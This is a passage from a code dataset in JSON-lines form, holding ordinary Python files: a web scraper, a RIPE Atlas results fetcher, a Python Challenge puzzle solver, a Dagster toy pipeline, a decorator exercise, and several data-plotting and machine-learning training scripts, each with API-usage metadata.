"sqlalchemy.Column", "line_number": 59, "usage_type": "call"}, {"api_name": "sqlalchemy.DateTime", "line_number": 59, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 60, "usage_type": "call"}, {"api_name": "sqlalchemy.DateTime", "line_number": 60, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 61, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 61, "usage_type": "call"}, {"api_name": "sqlalchemy.Column", "line_number": 62, "usage_type": "call"}, {"api_name": "sqlalchemy.Integer", "line_number": 62, "usage_type": "call"}, {"api_name": "sqlalchemy.ForeignKeyConstraint", "line_number": 63, "usage_type": "call"}, {"api_name": "sqlalchemy.ForeignKeyConstraint", "line_number": 64, "usage_type": "call"}, {"api_name": "sqlalchemy.PrimaryKeyConstraint", "line_number": 65, "usage_type": "call"}, {"api_name": "alembic.op.drop_table", "line_number": 72, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 72, "usage_type": "name"}, {"api_name": "alembic.op.drop_table", "line_number": 73, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 73, "usage_type": "name"}, {"api_name": "alembic.op.drop_index", "line_number": 74, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 74, "usage_type": "name"}, {"api_name": "alembic.op.f", "line_number": 74, "usage_type": "call"}, {"api_name": "alembic.op.drop_table", "line_number": 75, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 75, "usage_type": "name"}, {"api_name": "alembic.op.drop_index", "line_number": 76, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 76, "usage_type": "name"}, {"api_name": "alembic.op.f", "line_number": 76, "usage_type": "call"}, {"api_name": "alembic.op.drop_table", "line_number": 77, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 77, "usage_type": "name"}, {"api_name": "alembic.op.drop_index", "line_number": 78, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 78, "usage_type": "name"}, {"api_name": "alembic.op.f", "line_number": 78, "usage_type": "call"}, {"api_name": "alembic.op.drop_table", "line_number": 79, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 79, "usage_type": "name"}]}
+{"seq_id": "55686070", "text": "# coding: utf-8\nimport argparse\nfrom pyquery import PyQuery as pq\n\ndef getElementBySelector(URL, selector):\n pqobj = pq(URL)\n parseUrl = pqobj(selector);\n \n # if default selector then return page content\n if selector == \"html\": \n result = parseUrl.outerHtml()\n #else return list of found elements\n else : \n result = [i.text() for i in parseUrl.items()]\n return result\n\ndef isVowel(letter):\n vowels = (\"a\", \"e\", \"i\", \"o\", \"u\", \"y\", #english alphabet\n \"а\", \"е\", \"ё\", \"и\", \"о\", \"у\", \"ы\", \"э\", \"ю\", \"я\") #russian alphabet\n return letter.lower() in vowels;\n\ndef isLetter(letter):\n letter_code = ord(letter.lower())\n \n #97-122 : english alphabet letters\n english_letter = 97 <= letter_code <= 122\n \n #1072-1103 и 1105 : russian alphabet letters\n russian_letter = 1072 <= letter_code <= 1105 or letter_code == 1105\n \n if english_letter or russian_letter:\n return True\n else:\n return False\n\ndef mySortFunction(data):\n if type(data) != str:\n vowels = []\n consonant = []\n other = []\n \n #divide by letters\n for i in data:\n if isVowel(i[0]):\n vowels.append(i)\n elif isLetter(i[0]):\n consonant.append(i)\n else:\n other.append(i)\n \n vowels.sort(key=lambda inputString: inputString[0])\n consonant.sort(key=lambda inputString: inputString[0])\n other.sort(key=lambda inputString: inputString[0])\n\n result = [i for i in vowels]\n for i in consonant:\n result.append(i)\n for i in other:\n result.append(i)\n \n return result\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"Parser for any url using css-selector.\")\n parser.add_argument(\"URL\", type=str, help=\"url to parse\")\n \n parser.add_argument(\"-c\", \"--css-selector\", type=str, default=\"html\", \n help=\"selector to get elements. By default selector = 'html'\")\n \n parser.add_argument(\"-s\", \"--sorting\", action=\"store_true\", \n help=\"include the option to sord output data. By default=False\")\n args = parser.parse_args()\n\n result = getElementBySelector(args.URL, args.css_selector)\n \n if args.sorting:\n result = mySortFunction(result)\n\n # танцы с бубном над codepage\n # http://trust-host.ru/support-host/site/175-kodirovka-cp1251-na-sajte.html\n #result = result.encode('iso-8859-1').decode(\"cp1251\").encode(\"utf-8\").decode(\"utf-8\")\n\n for i in result:\n print(i)\n", "sub_path": "parser.py", "file_name": "parser.py", "file_ext": "py", "file_size_in_byte": 2687, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "pyquery.PyQuery", "line_number": 6, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 64, "usage_type": "call"}]}
+{"seq_id": "271657201", "text": "#!/usr/bin/python\n\nimport urllib2\nimport json\nimport sys\nimport os\nimport argparse\nfrom collections import defaultdict\n\n\ndef read_auth(filename):\n with open(filename, 'rb') as auth_file:\n key = auth_file.readline()[:-1]\n\n return key\n\n\nparser = argparse.ArgumentParser(\"Retrieves traceroute results\")\nparser.add_argument('--datadir', required=True, help=\"directory to save output\")\nparser.add_argument('--msm', required=False, type=int, help=\"Fetch specific measurement id\")\nargs = parser.parse_args()\n\nif not os.path.exists(args.datadir):\n print(\"Data directory %s must exists!\" % args.datadir)\n sys.exit(1)\n\natlas_read_api_key = 'read-key.txt'\nauthkey = read_auth(atlas_read_api_key)\nif authkey is None:\n print(\"Auth file %s not found, aborting\" % atlas_read_api_key)\n sys.exit(1)\n\nif not args.msm:\n with open(os.path.join(args.datadir, 'measurements.json')) as msm_file:\n msm_data = json.load(msm_file)\nelse:\n msm_data = {'cc': [args.msm]}\n\nresult_list = defaultdict(list)\nfor cc, msm_list in msm_data.iteritems():\n for msm in msm_list:\n print(\"Fetching results for measurement %s\" % msm)\n api_url = \"https://atlas.ripe.net/api/v1/measurement/{}/result/?key={}\".format(msm, authkey)\n request = urllib2.Request(api_url)\n request.add_header(\"Accept\", \"application/json\")\n try:\n conn = urllib2.urlopen(request)\n msm_data = json.load(conn)\n for result in msm_data:\n result_list[cc].append(result)\n conn.close()\n except urllib2.HTTPError as e:\n print >> sys.stderr, (\"Fatal error: %s\" % e.read())\n raise\n\nwith open(os.path.join(args.datadir, 'results.json'), 'wb') as res_file:\n json.dump(result_list, res_file)\n", "sub_path": "fetch-results.py", "file_name": "fetch-results.py", "file_ext": "py", "file_size_in_byte": 1776, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path", "line_number": 23, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 25, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path", "line_number": 34, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 35, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 39, "usage_type": "call"}, {"api_name": "urllib2.Request", "line_number": 44, "usage_type": "call"}, {"api_name": "urllib2.urlopen", "line_number": 47, "usage_type": "call"}, {"api_name": "json.load", "line_number": 48, "usage_type": "call"}, {"api_name": "urllib2.HTTPError", "line_number": 52, "usage_type": "attribute"}, {"api_name": "sys.stderr", "line_number": 53, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 56, "usage_type": "call"}, {"api_name": "os.path", "line_number": 56, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 57, "usage_type": "call"}]}
+{"seq_id": "214589076", "text": "import urllib\nimport http.cookiejar\nimport re\nimport bz2\n\ncookiejar = http.cookiejar.CookieJar() #声明一个CookieJar对象实例来保存cookie\nhandler = urllib.request.HTTPCookieProcessor(cookiejar) #利用HTTPCookieProcessor对象来创建cookie处理器\nopener = urllib.request.build_opener(handler,urllib.request.HTTPHandler) #通过handler来构建opener\nurllib.request.install_opener(opener) #安装opener作为urlopen()使用的全局URL opener,即以后调用urlopen()时都会使用安装的opener对象。\n\nnum = '12345'\nurl_prefix = 'http://www.pythonchallenge.com/pc/def/linkedlist.php?busynothing='\ninfojar = []\nwhile True:\n file = urllib.request.urlopen(url_prefix+num)\n data = file.read().decode('UTF-8')\n print(data)\n infojar.append(list(cookiejar)[0].value)\n file.close()\n if re.findall('([0-9]+)',data):\n num = re.findall('([0-9]+)',data)[-1]\n else:\n break\n\nunquote_info = urllib.parse.unquote_to_bytes(''.join(infojar).replace('+', '%20'))\nprint(bz2.decompress(unquote_info).decode('utf-8'))\n \n", "sub_path": "level17/cookies.py", "file_name": "cookies.py", "file_ext": "py", "file_size_in_byte": 1053, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "http.cookiejar.cookiejar.CookieJar", "line_number": 6, "usage_type": "call"}, {"api_name": "http.cookiejar.cookiejar", "line_number": 6, "usage_type": "attribute"}, {"api_name": "http.cookiejar", "line_number": 6, "usage_type": "name"}, {"api_name": "urllib.request.HTTPCookieProcessor", "line_number": 7, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 7, "usage_type": "attribute"}, {"api_name": "urllib.request.build_opener", "line_number": 8, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 8, "usage_type": "attribute"}, {"api_name": "urllib.request.install_opener", "line_number": 9, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 9, "usage_type": "attribute"}, {"api_name": "urllib.request.urlopen", "line_number": 15, "usage_type": "call"}, {"api_name": "urllib.request", "line_number": 15, "usage_type": "attribute"}, {"api_name": "re.findall", "line_number": 20, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 21, "usage_type": "call"}, {"api_name": "urllib.parse.unquote_to_bytes", "line_number": 25, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 25, "usage_type": "attribute"}, {"api_name": "bz2.decompress", "line_number": 26, "usage_type": "call"}]}
+{"seq_id": "255050003", "text": "# coding=utf8\nfrom setuptools import setup\n__author__ = 'hellflame'\n\n\nsetup(\n name='paramSeeker',\n version=\"0.3.2\",\n keywords=('param', 'parameter', 'terminal handler'),\n description=\"Terminal parameter retrive then 执行以及参数转发,开发实体内容\",\n license='Apache License',\n author='hellflame',\n author_email='hellflamedly@gmail.com',\n url=\"https://github.com/hellflame/paramSeeker\",\n packages=[\n 'paramSeeker'\n ],\n platforms=\"any\",\n classifiers=[\n 'Development Status :: 5 - Production/Stable',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: Apache Software License',\n 'Topic :: Software Development :: Libraries',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2.7',\n 'Programming Language :: Python :: 3.4',\n \"Operating System :: OS Independent\"\n ],\n entry_points={\n 'console_scripts': [\n 'seeker=paramSeeker.example:test_env'\n ]\n }\n)\n\n\n", "sub_path": "setup.py", "file_name": "setup.py", "file_ext": "py", "file_size_in_byte": 1104, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "setuptools.setup", "line_number": 6, "usage_type": "call"}]}
+{"seq_id": "188664912", "text": "import random\nimport time\n\nfrom dagster import (\n Field,\n InputDefinition,\n ModeDefinition,\n Output,\n OutputDefinition,\n pipeline,\n solid,\n)\nfrom dagster.core.definitions.executor import default_executors\n\n\ndef get_executor_defs():\n try:\n from dagster_dask import dask_executor\n\n return default_executors + [dask_executor]\n except ImportError:\n return default_executors\n\n\n@solid(\n input_defs=[InputDefinition('chase_duration', int)],\n output_defs=[OutputDefinition(int, 'total')],\n config_schema={\n 'chase_size': Field(\n int,\n default_value=100000,\n is_required=False,\n description='How big should the pointer chase array be?',\n )\n },\n)\ndef hammer(context, chase_duration):\n '''what better way to do a lot of gnarly work than to pointer chase?'''\n ptr_length = context.solid_config['chase_size']\n\n data = list(range(0, ptr_length))\n random.shuffle(data)\n\n curr = random.randint(0, ptr_length)\n # and away we go\n start_time = time.time()\n while (time.time() - start_time) < chase_duration:\n curr = data[curr]\n\n context.log.info('Hammered - start %d end %d' % (start_time, time.time()))\n return chase_duration\n\n\n@solid(\n config_schema=Field(int, is_required=False, default_value=1),\n output_defs=[\n OutputDefinition(int, 'out_1'),\n OutputDefinition(int, 'out_2'),\n OutputDefinition(int, 'out_3'),\n OutputDefinition(int, 'out_4'),\n ],\n)\ndef chase_giver(context):\n chase_duration = context.solid_config\n\n yield Output(chase_duration, 'out_1')\n yield Output(chase_duration, 'out_2')\n yield Output(chase_duration, 'out_3')\n yield Output(chase_duration, 'out_4')\n\n\n@solid(\n input_defs=[\n InputDefinition('in_1', int),\n InputDefinition('in_2', int),\n InputDefinition('in_3', int),\n InputDefinition('in_4', int),\n ],\n output_defs=[OutputDefinition(int)],\n)\ndef reducer(_, in_1, in_2, in_3, in_4):\n return in_1 + in_2 + in_3 + in_4\n\n\n@pipeline(\n # Needed for Dask tests which use this pipeline\n mode_defs=[ModeDefinition(executor_defs=get_executor_defs())]\n)\ndef hammer_pipeline():\n\n out_1, out_2, out_3, out_4 = chase_giver()\n return reducer(\n in_1=hammer(chase_duration=out_1),\n in_2=hammer(chase_duration=out_2),\n in_3=hammer(chase_duration=out_3),\n in_4=hammer(chase_duration=out_4),\n )\n", "sub_path": "python_modules/dagster-test/dagster_test/toys/hammer.py", "file_name": "hammer.py", "file_ext": "py", "file_size_in_byte": 2471, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "dagster.core.definitions.executor.default_executors", "line_number": 20, "usage_type": "name"}, {"api_name": "dagster_dask.dask_executor", "line_number": 20, "usage_type": "name"}, {"api_name": "dagster.core.definitions.executor.default_executors", "line_number": 22, "usage_type": "name"}, {"api_name": "random.shuffle", "line_number": 42, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 44, "usage_type": "call"}, {"api_name": "time.time", "line_number": 46, "usage_type": "call"}, {"api_name": "time.time", "line_number": 47, "usage_type": "call"}, {"api_name": "time.time", "line_number": 50, "usage_type": "call"}, {"api_name": "dagster.solid", "line_number": 25, "usage_type": "call"}, {"api_name": "dagster.InputDefinition", "line_number": 26, "usage_type": "call"}, {"api_name": "dagster.OutputDefinition", "line_number": 27, "usage_type": "call"}, {"api_name": "dagster.Field", "line_number": 29, "usage_type": "call"}, {"api_name": "dagster.Output", "line_number": 66, "usage_type": "call"}, {"api_name": "dagster.Output", "line_number": 67, "usage_type": "call"}, {"api_name": "dagster.Output", "line_number": 68, "usage_type": "call"}, {"api_name": "dagster.Output", "line_number": 69, "usage_type": "call"}, {"api_name": "dagster.solid", "line_number": 54, "usage_type": "call"}, {"api_name": "dagster.Field", "line_number": 55, "usage_type": "call"}, {"api_name": "dagster.OutputDefinition", "line_number": 57, "usage_type": "call"}, {"api_name": "dagster.OutputDefinition", "line_number": 58, "usage_type": "call"}, {"api_name": "dagster.OutputDefinition", "line_number": 59, "usage_type": "call"}, {"api_name": "dagster.OutputDefinition", "line_number": 60, "usage_type": "call"}, {"api_name": "dagster.solid", "line_number": 72, "usage_type": "call"}, {"api_name": "dagster.InputDefinition", "line_number": 74, "usage_type": "call"}, {"api_name": "dagster.InputDefinition", "line_number": 75, "usage_type": "call"}, {"api_name": "dagster.InputDefinition", "line_number": 76, "usage_type": "call"}, {"api_name": "dagster.InputDefinition", "line_number": 77, "usage_type": "call"}, {"api_name": "dagster.OutputDefinition", "line_number": 79, "usage_type": "call"}, {"api_name": "dagster.pipeline", "line_number": 85, "usage_type": "call"}, {"api_name": "dagster.ModeDefinition", "line_number": 87, "usage_type": "call"}]}
+{"seq_id": "428250383", "text": "\"\"\"\nConcepts: you can decorate methods. And classes!\n\nSame thing but for classes. This introduces a new wrinkle when decorating methods.\n\nThe problem is that our decorator is invoked as each method is defined - we get\nthe function that results from the definition.\n\nBut to store that function function we're going to need to have access to the\ncontaining class to get to the `ENDPOINTS` class variable... and the class\nhasn't been defined when our decorator runs!\n\nWe need to defer actually collecting the methods until after the class has been\ndefined - when it can be done by a class decorator!\n\nUpdate the `endpoint` decorator to mark decorated methods and then update the\n`collect` decorator to loop through the attributes of the class finding the\nmethods we marked and storing them in the `RemoteAPI.ENDPOINTS` dict.\n\nHint: help(vars). Also - functions are objects like anything else, open by\ndefault so its totally fine to say `function._my_mark = 1`.\n\n\"\"\"\nimport argparse\n\n\ndef endpoint(f):\n return f\n\n\ndef collect(klass):\n return klass\n\n\n@collect\nclass RemoteAPI:\n ENDPOINTS = {}\n\n def __init__(self, secrets=None):\n # Presumably load some secrets from a file so we can authenticate our client\n pass\n\n @endpoint\n def sessions(self, event_id=None):\n \"\"\"Returns the session ids for the event.\"\"\"\n return [1, 2, 3]\n\n @endpoint\n def events(self):\n \"\"\"Returns the events to which you have access\"\"\"\n return [2717]\n\n\nif __name__ == \"__main__\":\n # Setup CLI options\n parser = argparse.ArgumentParser()\n # Add a subcommand for every endpoint we've implemented\n subparsers = parser.add_subparsers(\n title=\"Endpoints\",\n help=\"The following endpoints are supported:\",\n dest=\"subcommand\",\n )\n client = RemoteAPI()\n # Using inspect to add flags for endpoint arguments ommitted for brevity\n for (name, func) in client.ENDPOINTS.items():\n sub = subparsers.add_parser(name, help=func.__doc__)\n\n # Pick a subcommand to run\n args = parser.parse_args()\n if not args.subcommand:\n parser.exit(\"Please specify a subcommand\")\n function = client.ENDPOINTS[args.subcommand]\n\n print(function(client)) # Passing instance of RemoteAPI to self. Do you know why?\n", "sub_path": "c_methods.py", "file_name": "c_methods.py", "file_ext": "py", "file_size_in_byte": 2282, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 56, "usage_type": "call"}]}
+{"seq_id": "552178008", "text": "'''\nCreated on May 31, 2016\n\n@author: Peter Hillyard\n'''\n\n# This script is used to plot a link using all channels\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\nfname = 'data/rss_data/pizza_house/rss_2016_05_18_epatch_peter_walk_all.txt'\nN = 20\nC = 4\nL = N*(N-1)*C\nlink_database = np.zeros((L,4))\nlink_idx = 0\n\nfor ch in range(C):\n for tx in range(N):\n for rx in range(N):\n if tx == rx:\n continue\n link_database[link_idx,0] = link_idx\n link_database[link_idx,1] = tx\n link_database[link_idx,2] = rx\n link_database[link_idx,3] = ch\n link_idx += 1\n\nplot_link=None\nplot_pair = [1,2]\n\nif plot_link is not None:\n link_to_plot = int(plot_link)\nelif plot_pair is not None:\n tmp = (link_database[:,1] == plot_pair[0]-1) & (link_database[:,2] == plot_pair[1]-1)\n link_to_plot = link_database[tmp,0].astype('int')\n\ntimestamp_vec = []\nrss_vec = []\n\nwith open(fname,'r') as f:\n for line in f:\n split_line = line.split(' ')\n \n timestamp_vec.append(float(split_line.pop()))\n rss = np.array([float(ii) for ii in split_line])\n \n rss_vec.append(rss[link_to_plot].tolist())\n \nrss_vec = np.array(rss_vec)\nrss_vec[rss_vec == 127] = np.nan\ntimestamp_vec = np.array(timestamp_vec)-timestamp_vec[0]\n\nplt.plot(timestamp_vec,rss_vec)\nplt.show()\n ", "sub_path": "plot_link.py", "file_name": "plot_link.py", "file_ext": "py", "file_size_in_byte": 1386, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "numpy.zeros", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 47, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 52, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}]}
+{"seq_id": "455305569", "text": "import argparse\nimport json\nimport os\n\nimport numpy as np\nimport tensorflow as tf\n\n\n# Read parameters from Valohai\n# This enables Valohai to version your parameters,\n# run quick iterations and do hyperparameter optimization\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--epochs', type=int, default=5)\nparser.add_argument('--learning_rate', type=float, default=0.001)\nargs = parser.parse_args()\n\n\n# Read input files from Valohai inputs directory\n# This enables Valohai to version your training data\n# and cache the data for quick experimentation\n\ninput_path = os.getenv('VH_INPUTS_DIR', './inputs')\nf = os.path.join(input_path, 'preprocessed_mnist/preprocessed_mnist.npz')\n\nwith np.load(f, allow_pickle=True) as f:\n x_train, y_train = f['x_train'], f['y_train']\n x_test, y_test = f['x_test'], f['y_test']\n\nmodel = tf.keras.models.Sequential([\n tf.keras.layers.Flatten(input_shape=(28, 28)),\n tf.keras.layers.Dense(128, activation='relu'),\n tf.keras.layers.Dropout(0.2),\n tf.keras.layers.Dense(10, activation='softmax')\n])\n\nmodel.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=args.learning_rate),\n loss='sparse_categorical_crossentropy',\n metrics=['accuracy'])\n\n\n# Print metrics out as JSON\n# This enables Valohai to version your metadata\n# and for you to use it to compare experiments\n\ndef log(epoch, logs):\n print()\n print(json.dumps({\n 'epoch': epoch,\n 'loss': str(logs['loss']),\n 'acc': str(logs['acc']),\n }))\n\ncb = tf.keras.callbacks.LambdaCallback(on_epoch_end=log)\n\nmodel.fit(x_train, y_train, epochs=args.epochs, callbacks=[cb])\n\n\n# Evaluate the model and print out the test metrics as JSON\n\ntest_loss, test_acc = model.evaluate(x_test, y_test, verbose=2)\nprint(json.dumps({\n 'test_loss': str(test_loss),\n 'test_acc': str(test_acc),\n}))\n\n\n# Write output files to Valohai outputs directory\n# This enables Valohai to version your data \n# and upload output it to the default data store\n\npath = os.getenv('VH_OUTPUTS_DIR', './outputs')\nmodel.save(os.path.join(path, 'model.h5'))\n", "sub_path": "train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 2077, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 13, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 23, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 24, "usage_type": "call"}, {"api_name": "os.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "numpy.load", "line_number": 26, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.Sequential", "line_number": 30, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 30, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Flatten", "line_number": 31, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 31, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 32, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 32, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dropout", "line_number": 33, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 33, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 34, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 34, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.optimizers.Adam", "line_number": 37, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 37, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 48, "usage_type": "call"}, {"api_name": "tensorflow.keras.callbacks.LambdaCallback", "line_number": 54, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 54, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 62, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 72, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 73, "usage_type": "call"}, {"api_name": "os.path", "line_number": 73, "usage_type": "attribute"}]}
+{"seq_id": "387057957", "text": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Nov 1 20:09:00 2016\n\n@author: mac\n\"\"\"\n\nimport numpy as np\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer, TfidfVectorizer\nfrom sklearn.multiclass import OneVsRestClassifier, OneVsOneClassifier\nfrom sklearn.svm import LinearSVC\nfrom sklearn import metrics, tree, cross_validation\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.linear_model import RandomizedLogisticRegression\nimport glob\nimport codecs\n\ndata = {\"train\": {\"pos\": [], \"neg\": []},\n \"test\": {\"pos\": [], \"neg\": []}}\n\ntxt_types = [(\"train\", \"neg\"), (\"train\", \"pos\"), (\"test\", \"neg\"), (\"test\", \"pos\")]\n\n# with open should add encoding='utf-8', errors='ignore' \n#otherwise failed \"'ascii' codec can't decode byte 0xc3 in position 404: ordinal not in range(128)\"\nfor t in txt_types:\n for txt_file in glob.glob(\"aclImdb/\" + t[0] + \"/\" + t[1] + \"/*.txt\"):\n with codecs.open(txt_file, \"r\",encoding='utf-8', errors='ignore') as f:\n text = f.read()\n data[t[0]][t[1]].append(text)\n#list(data[\"train\"][\"neg\"])[0]\n# get training + test data\n\nimport numpy as np\nX_train = data[\"train\"][\"pos\"] + data[\"train\"][\"neg\"]\ny_train = np.append(np.ones(len(data[\"train\"][\"pos\"])), np.zeros(len(data[\"train\"][\"neg\"])))\n\nX_test = data[\"test\"][\"pos\"] + data[\"test\"][\"neg\"]\ny_test = np.append(np.ones(len(data[\"test\"][\"pos\"])), np.zeros(len(data[\"test\"][\"neg\"])))\nprint(len(X_train), len(y_train))\nprint(len(X_test), len(y_test))\n\n#tfidf transformation is automately employed in Pipeline\n## tfidf = TfidfVectorizer()\n## tfidf.fit_transform(X_train)\n\n# build a pipeline - SVC\nfrom sklearn.pipeline import Pipeline\ntext_clf = Pipeline([('vect', CountVectorizer(ngram_range=(1, 2))),\n ('tfidf', TfidfTransformer()),\n ('clf', OneVsRestClassifier(LinearSVC(random_state=0)))\n ])\n\n# fit using pipeline\nclf = text_clf.fit(X_train, y_train)\n\n# predict\npredicted = clf.predict(X_test)\nclf.score(X_test, y_test) \n\n# print metrics\nprint(metrics.classification_report(y_test, predicted))\n\n#scores = cross_validation.cross_val_score(text_clf, X_train + X_test, np.append(y_train, y_test), cv=5)\n\n#First we have to one-hot encode the text, but let's limit the features to the most common 20,000 words.\nfrom collections import Counter\n\nmax_features = 20000\nall_words = []\n\nfor text in X_train + X_test:\n all_words.extend(text.split())\nunique_words_ordered = [x[0] for x in Counter(all_words).most_common()] #x[1] times\nword_ids = {}\nrev_word_ids = {}\nfor i, x in enumerate(unique_words_ordered[:max_features-1]):\n word_ids[x] = i + 1 # so we can pad with 0s\n rev_word_ids[i + 1] = x\n\n\nX_train_one_hot = []\nfor text in X_train:\n t_ids = [word_ids[x] for x in text.split() if x in word_ids]\n X_train_one_hot.append(t_ids)\n \nX_test_one_hot = []\nfor text in X_test:\n t_ids = [word_ids[x] for x in text.split() if x in word_ids]\n X_test_one_hot.append(t_ids)\n \n \n#Now we can use Keras, a popular Theano wrapper, to quickly build an NN classifier.\nfrom __future__ import print_function\nimport numpy as np\nnp.random.seed(1337) # for reproducibility\n\nfrom keras.preprocessing import sequence\nfrom keras.utils import np_utils\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Dropout, Activation, Embedding\nfrom keras.layers import LSTM, SimpleRNN, GRU\n\nmaxlen = 80 # cut texts after this number of words (among top max_features most common words)\nbatch_size = 32\n\nprint('Pad sequences (samples x time)')\nX_train = sequence.pad_sequences(X_train_one_hot, maxlen=maxlen)\nX_test = sequence.pad_sequences(X_test_one_hot, maxlen=maxlen)\nprint('X_train shape:', X_train.shape)\nprint('X_test shape:', X_test.shape)\n\nprint('Build model...')\nmodel = Sequential()\nmodel.add(Embedding(max_features, 128, dropout=0.2))\nmodel.add(LSTM(128, dropout_W=0.2, dropout_U=0.2)) # try using a GRU instead, for fun\nmodel.add(Dense(1))\nmodel.add(Activation('sigmoid'))\n\n# try using different optimizers and different optimizer configs\nmodel.compile(loss='binary_crossentropy',\n optimizer='adam',\n metrics=['accuracy'])\n\nprint('Train...')\nmodel.fit(X_train, y_train, batch_size=batch_size, nb_epoch=15,\n validation_data=(X_test, y_test))\nscore, acc = model.evaluate(X_test, y_test,\n batch_size=batch_size)\nprint('Test score:', score)\nprint('Test accuracy:', acc)\n", "sub_path": "reference/movie_review_test.py", "file_name": "movie_review_test.py", "file_ext": "py", "file_size_in_byte": 4466, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "glob.glob", "line_number": 27, "usage_type": "call"}, {"api_name": "codecs.open", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 39, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 39, "usage_type": "call"}, {"api_name": "sklearn.pipeline.Pipeline", "line_number": 49, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.CountVectorizer", "line_number": 49, "usage_type": "call"}, {"api_name": "sklearn.feature_extraction.text.TfidfTransformer", "line_number": 50, "usage_type": "call"}, {"api_name": "sklearn.multiclass.OneVsRestClassifier", "line_number": 51, "usage_type": "call"}, {"api_name": "sklearn.svm.LinearSVC", "line_number": 51, "usage_type": "call"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 62, "usage_type": 